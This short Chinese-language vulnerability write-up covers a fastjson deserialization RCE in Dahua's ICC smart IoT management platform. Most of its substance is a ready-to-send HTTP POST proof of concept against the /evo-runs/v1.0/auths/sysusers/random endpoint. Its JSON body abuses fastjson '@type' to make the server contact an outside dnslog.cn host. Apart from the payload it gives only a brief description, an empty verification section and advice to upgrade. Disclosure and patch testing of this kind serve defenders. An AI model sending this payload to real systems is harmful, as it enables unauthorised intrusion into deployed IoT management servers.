漏洞验证-大华ICC智能物联综合管理平台sysusers/random远程代码执行漏洞

一、漏洞描述

大华ICC智能物联综合管理平台是专门为大华股份研发的一款物联网管理平台，它可以对多个智能设备和系统进行统一管理和控制，方便用户实时了解和管理各个设备和系统的状态。该平台提供了一系列的智能化功能，包括设备管理、监控预警、数据分析等，旨在为用户提供更加智能、高效和便捷的物联网管理体验，其使用了fastjson组件，存在反序列化漏洞导致RCE。

二、漏洞POC

POST /evo-runs/v1.0/auths/sysusers/random HTTP/2

Host: XXXX

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko

Accept: */*

Accept-Encoding: gzip,deflate

Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3

Content-Type: application/json

Te: trailers

Content-Length: 150

 

 

{

    "a":{

        "@type":"com.alibaba.fastjson.JSONObject",

        {"@type":"java.net.URL","val":"http://wdjal5.dnslog.cn"}

        }""

}

三、漏洞验证

四、修复建议

联系官方售后或客服升级至最新版本 官网地址: https://www.dahuatech.com/